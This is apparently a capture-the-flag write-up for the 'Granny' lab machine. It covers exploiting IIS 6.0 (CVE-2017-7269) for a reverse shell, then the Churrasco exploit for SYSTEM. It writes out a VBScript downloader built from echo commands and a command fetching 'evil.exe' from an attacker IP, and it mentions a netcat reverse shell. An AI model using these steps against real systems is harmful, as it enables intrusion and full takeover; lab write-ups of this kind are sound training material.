Granny

Gaining Access

Nmap scan:

IIS 6.0

This machine is running an outdated version of Microsoft IIS, which is vulnerable to a RCE exploit.

iis6-exploit-2017-CVE-2017-7269/iis6 reverse shell at master · g0rx/iis6-exploit-2017-CVE-2017-7269GitHub

Using this, we can gain a reverse shell easily:

Privilege Escalation

Churrasco

We can enumerate the machine using systeminfo.

This is a really old version of Windows that is outdated and vulnerable to loads of exploits. One exploit is the Churrasco exploit, which works on Windows Server 2003 machines. However, because this machine was so old, it was hard to transfer files over to it using conventional Windows methods.

So, we would need to create a wget binaruy using vbs.

echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET",strURL,False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile,True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs
# Afterwards, you can run this.
cscript wget.vbs http://192.168.10.5/evil.exe evil.exe

Afterwards, we can download the binary from here:

https://github.com/Re4son/Churrasco/raw/master/churrasco.exe

The exploit works through impersonating the SYSTEM user to execute commands by stealing the tokens from the worker processes run by the SYSTEM user.

The exploit can be used to gain a reverse shell easily via nc.exe:

A listener port would have a shell as SYSTEM after execution.